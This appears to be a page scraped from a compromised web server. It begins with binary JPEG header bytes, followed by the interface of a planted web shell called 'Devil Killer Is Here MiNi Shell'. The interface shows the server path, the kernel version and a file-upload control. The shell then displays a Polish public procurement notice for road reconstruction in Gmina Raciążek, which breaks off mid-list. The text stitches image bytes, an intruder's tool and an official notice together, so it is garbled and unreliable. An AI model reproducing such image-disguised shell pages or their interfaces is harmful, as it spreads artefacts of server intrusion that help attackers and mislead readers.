JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230328/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230328/0015306101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa, przebudowa, remont dróg na terenie Gminy Raciążek </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA RACIĄŻEK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 910866442</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wysoka 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Raciążek</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-721</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL619 - Włocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@raciazek.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.raciazek.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa, przebudowa, remont dróg na terenie Gminy Raciążek </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d2c2fd8a-cd2d-11ed-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00153061</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-03-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00081647/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Budowa, przebudowa, remont dróg na terenie Gminy Raciążek</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://raciazek.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://raciazek.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">4. Zamawiający określa niezbędne<br/>wymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej<br/>niż 512 kb/s,<br/>2) komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB<br/>Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10.4, Linux, lub ich nowsze wersje,<br/>3) zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2,<br/>najlepiej w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0;<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>5. Zamawiający dopuszcza przesyłanie plików o wielkości do 100 MB.<br/>6. Zalecenia Zamawiającego dotyczące:<br/>1) kwalifikowanego podpisu elektronicznego:<br/>a) dla dokumentów w formacie .pdf zaleca się podpis formatem PAdES (pdf advanced electronic signature),<br/>b) dla dokumentów w formacie innym niż .pdf zaleca się podpis formatem XAdES (HML pdf advanced electronic signature).<br/>2) podpisu zaufanego:<br/>a) wielkość pliku nie może przekraczać 10 MB,<br/>b) dla dokumentów w formacie .pdf zaleca się podpis formatem PAdES;<br/>Podpisany plik ma rozszerzenie .pdf,<br/>c) dla dokumentów w formacie innym niż .pdf zaleca się podpis formatem<br/>XAdES. Podpisany plik ma rozszerzenie .xml.<br/>3) podpisu osobistego:<br/>a) w przypadku wykorzystania aplikacji eDO Atp (obsługuje tylko dokumenty w formacie .pdf) na telefonach z obsługą technologii<br/>NFC wielkość<br/>dokumentów nie może przekroczyć 5MB,<br/>b) dla dokumentów w formacie .pdf zaleca się podpis wewnętrzny otoczony,<br/>c) dokumenty w formacie innym niż .pdf zaleca się podpisywać podpisem<br/>zewnętrznym lub otaczającym.<br/>4) Po podpisaniu plików a przed ich załączeniem na Platformę zaleca się dokonanie weryfikacji kompletności i poprawności<br/>wszystkich złożonych podpisów (w szczególności gdy dokument został podpisany przez kilku reprezentantów lub przy wykorzystaniu<br/>różnych podpisów). W przypadku korzystania z wariantu składania podpisów zewnętrznych konieczne jest<br/>załączenie na Platformę dwóch plików, tj. pliku podpisywanego i pliku zawierającego podpis.<br/>7. Zamawiający określa informacje na temat kodowania i czasu odbioru danych, tj.:<br/>1) plik/pliki oferty załączony/e przez Wykonawcę na Platformie i zapisany/e, widoczny/e jest/są na Platformie jako zaszyfrowany/e –<br/>format kodowania UTF8. Możliwość otworzenia pliku/ów dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie<br/>terminu otwarcia ofert,<br/>2) oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz<br/>dokładny czas (hh:mm:ss) generowany wg czasu lokalnego serwera<br/>synchronizowanego odpowiednim źródłem czasu.<br/>Pozostałe informacje w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zamawiający oświadcza, że spełnia wymogi określone w rozporządzeniu Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 4<br/>maja 2016 r.), dalej: RODO, tym samym dane<br/>osobowe podane przez Wykonawcę będą przetwarzane zgodnie z RODO oraz zgodnie z przepisami krajowymi.<br/>2. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016 r., str. 1; - dalej jako „RODO”)<br/>informujemy, że:<br/>1) Administratorem Danych Osobowych jest Gmina Raciążek, ul. Wysoka 4, 87-721 Raciążek reprezentowana przez Wójt Gminy<br/>Raciążek, e-mail: gmina@raciazek.pl, tel.: 54 283 1885;<br/>2) Zamawiający wyznaczył Inspektora Ochrony Danych Osobowych, z którym może się Pani/Pan skontaktować pod adresem e-mail:<br/>iod.ciurylo@gmail.com<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym<br/>postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie art. 275 pkt 1) (trybie podstawowym bez negocjacji;<br/>art. 6 ust. 1 lit. b RODO – w odniesieniu do danych osobowych osoby będącej stroną umowy oraz art. 6 ust. 1 lit e rozporządzenia<br/>2016/679 – w odniesieniu do pozostałych danych osobowych – w celu i zakresie niezbędnym do zawarcia i realizacji umowy.<br/>Ogłoszenie nr 2023/BZP 00092117/01 z dnia 2023-02-13<br/>2023-02-13 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na<br/>podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>4) Dobrowolne podanie wszelkich danych niewymaganych przepisami prawa jest traktowane jak wyrażenie zgody na ich<br/>przetwarzanie. W takim przypadku podstawą przetwarzania jest art. 6 ust. 1 lit. a ogólnego rozporządzenia o przetwarzaniu danych<br/>osobowych.<br/>Pozostałe informacje w SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">9) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego<br/>prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania<br/>dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o<br/>udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie<br/>może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2<br/>RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) W przypadku danych osobowych przetwarzanych na podstawie zgody przysługuje Pani/Panu prawo do cofnięcia zgody na<br/>przetwarzanie bez wpływu na zgodność z prawem przetwarzania, którego dokonano na podstawie zgody przed jej wycofaniem.<br/>10) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>11) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych<br/>osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki<br/>2, 00-193 Warszawa.<br/>Pozostałe informacje w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.3.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 11544213,20 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 6638204,58 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na jedną część</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.12.) Maksymalna liczba części, jaka może zostać udzielona jednemu wykonawcy: <span class="normal">1</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Realizacja zadania obejmuje:<br/>1. Przebudowa ulicy Polnej w miejscowości Raciążek na dł. 315,63 m (dz. nr 246/2, 670/5, 664, 656/19, 663, 656/14 obręb 0008 Raciążek)<br/>2. Przebudowa ulicy Przedmiejskiej w miejscowości Raciążek na dł. 295 m – etap I (dz. nr 663, 782 obręb 0008 Raciążek)<br/>3. Przebudowa ulicy Przedmiejskiej w miejscowości Raciążek na dł. 377,71 m – etap II (dz. nr 663, 664, 656/19, 656/14, 656/15, 656/4 obręb 0008 Raciążek)<br/>4. Przebudowa ulicy Podgórnej w miejscowości Raciążek na dł. 490,15 m – etap I (dz. nr 294/2, 425 obręb 0008 Raciążek)<br/>5. Przebudowa ulicy Okrężnej w miejscowości Raciążek na dł. 79,57 m (dz. nr 656/4 obręb 0008 Raciążek)<br/>6. Przebudowa ulicy Brzozowej w miejscowości Raciążek na dł. 457,80 m (dz. nr 273/2, 294/2 obręb 0008 Raciążek)<br/>7. Przebudowa drogi gminnej nr 160311C na dł. 754,00 m – etap I (dz. nr 22 obręb 0002 Turzynek)<br/>8. Przebudowa drogi gminnej nr 160311C na dł. 543,80 m – etap II (dz. nr 22 obręb 0002 Turzynek)<br/><br/>Szczegółowo zakres prac do wykonania w ramach przedmiotowego zadania opisany został <br/>w dokumentacji projektowej, stanowiącej załącznik nr 10 do SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 6638204,58 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">13 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">XXI. Opis kryteriów oceny ofert, wraz z podaniem wag tych kryteriów, i sposobu oceny ofert.<br/>1. Przy ocenie ofert wartość wagowa będzie wyrażona w punktach. Ocena ofert zostanie przeprowadzona wyłącznie w oparciu o<br/>przedstawione poniżej kryteria:<br/>Lp. Kryterium Symbol Waga kryterium Maksymalna liczba punktów w danym kryterium<br/>1. Cena C 60 Pmax1 = 60 pkt<br/>2. Okres rękojmi za wady i gwarancji G 40 Pmax2 = 40 pkt<br/>1) Kryterium 1: Cena<br/>C – liczba punktów przyznanych ocenianej ofercie w kryterium „Cena”, gdzie punkty wyliczane są wg wzoru:<br/>Cmin<br/>C = -------------- x 60 pkt<br/>Cb<br/>Cmin – najniższa cena brutto spośród wszystkich ofert niepodlegających odrzuceniu<br/>Cb – cena brutto oferty badanej<br/>2) Kryterium 2: Okres rękojmi za wady i gwarancji<br/>G – liczba punktów przyznanych ocenianej ofercie w kryterium „Okres rękojmi za wady i gwarancji”, zgodnie z poniższą tabelą:<br/>Lp. Okres gwarancji Liczba punktów<br/>1. 3 lata (minimalny okres) 0 pkt<br/>2. 4 lata 20 pkt<br/>3. 5 lat (maksymalny okres) 40 pkt<br/>Uwaga: Okres rękojmi za wady i gwarancji liczony jest w latach. Wykonawca winien zaoferować w przedmiotowym kryterium okres<br/>rękojmi za wady i gwarancji w pełnych okresach rocznych. Minimalny okres rękojmi za wady i gwarancji wynosi 3 lata. Maksymalny<br/>okres rękojmi za wady i gwarancji wynosi 5 lat.<br/>Jeżeli Wykonawca zaoferuje okres rękojmi za wady i gwarancji krótszy niż 3 lata – oferta takiego Wykonawcy zostanie odrzucona,<br/>jako niezgodna z SWZ.<br/>Jeżeli Wykonawca zaoferuje okres rękojmi za wady i gwarancji dłuższy niż 5 lat – do obliczeń w kryterium zostanie uwzględniony<br/>maksymalny możliwy okres rękojmi za wady i gwarancji wynoszący 5 lat, natomiast do umowy zostanie wpisany okres rękojmi za<br/>wady i gwarancji zaproponowany przez Wykonawcę. Zamawiający przyzna ofercie w tym kryterium 40 pkt.<br/>Jeżeli Wykonawca nie zaoferuje żadnego okresu rękojmi za wady gwarancji lub zaoferuje okres w miesiącach lub niepełnych latach<br/>przyjmuje się, że Wykonawca udzielił 3 lata rękojmi za wady i gwarancji i Zamawiający przyzna ofercie w tym kryterium 0 pkt.<br/>2. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po<br/>przecinku, zgodnie z zasadami arytmetyki.<br/>3. Za ofertę najkorzystniejszą uznana zostanie oferta, która w sumie uzyska najwyższą liczbę punktów w określonych przez<br/>Zamawiającego kryteriach.<br/>PŁ = C + G<br/>gdzie:<br/>PŁ - łączna liczba punktów<br/>C - liczba punktów w kryterium: Cena<br/>G - liczba punktów w kryterium: Okres rękojmi za wady i gwarancji<br/>4. Maksymalna łączna liczba punktów jaką może uzyskać Wykonawca wynosi – 100 pkt.<br/>5. Za ofertę najkorzystniejszą uznana zostanie oferta, która w sumie uzyska największą ilość punktów, biorąc pod uwagę kryterium<br/>„Cena” oraz kryterium „Okres rękojmi za wady i gwarancji” spośród ofert nieodrzuconych i spełniających wszystkie wymagania<br/>określone przez Zamawiającego w treści SWZ.<br/>6. Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku.<br/>Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>7. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim wymaganiom przedstawionym w<br/>ustawie Pzp oraz w SWZ i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryteria wyboru.<br/>8. Jeżeli nie będzie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert będą przedstawiały taki sam<br/>bilans ceny i innych kryteriów oceny ofert, Zamawiający wybierze spośród tych ofert ofertę z najniższą ceną.<br/>9. Jeżeli nie będzie można dokonać wyboru oferty w sposób, o którym mowa w ust. 8, Zamawiający wezwie Wykonawców, którzy<br/>złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi za wady i gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Realizacja zadania obejmuje:<br/>1. Przebudowa ulicy Wiśniowej w miejscowości Raciążek na dł. 744,87 m (dz. nr 643, 704, 782 obręb 0008 Raciążek)<br/>2. Przebudowa ulicy Spokojnej w miejscowości Raciążek na dł. 91,50 m (dz. nr 676/13, 782 obręb 0008 Raciążek)<br/>3. Przebudowa ulicy Winnicznej w miejscowości Raciążek na dł. 189,38 m (dz. nr 547, 558, 576/1, 576/3, 578/4, 579/2 obręb 0008 Raciążek)<br/>4. Przebudowa ulicy Kwiatowej w miejscowości Raciążek na dł. 154,16 m (dz. nr 246/2, 449 obręb 0008 Raciążek)<br/>5. Przebudowa ulicy Paśniki w miejscowości Raciążek na dł. 895,87 m – etap I (dz. nr 114 obręb 0008 Raciążek)<br/>6. Przebudowa ulicy Paśniki w miejscowości Raciążek na dł. 526,44 m – etap II (dz. nr 114 obręb 0008 Raciążek)<br/>7. Przebudowa ulicy Sadowej w miejscowości Raciążek na dł. 740,21 m (dz. nr 643, 760, 782 obręb 0008 Raciążek)<br/>8. Przebudowa ulicy Ogrodowej w miejscowości Raciążek na dł. 900,00 m – etap I (dz. nr 782 obręb 0008 Raciążek)<br/>9. Przebudowa ulicy Ogrodowej w miejscowości Raciążek na dł. 513,06 m – etap II (dz. nr 782, 829/4 obręb 0008 Raciążek)<br/>10. Przebudowa ulicy Cichej w miejscowości Raciążek na dł. 133,21 m (dz. nr 246/2, 647/6, 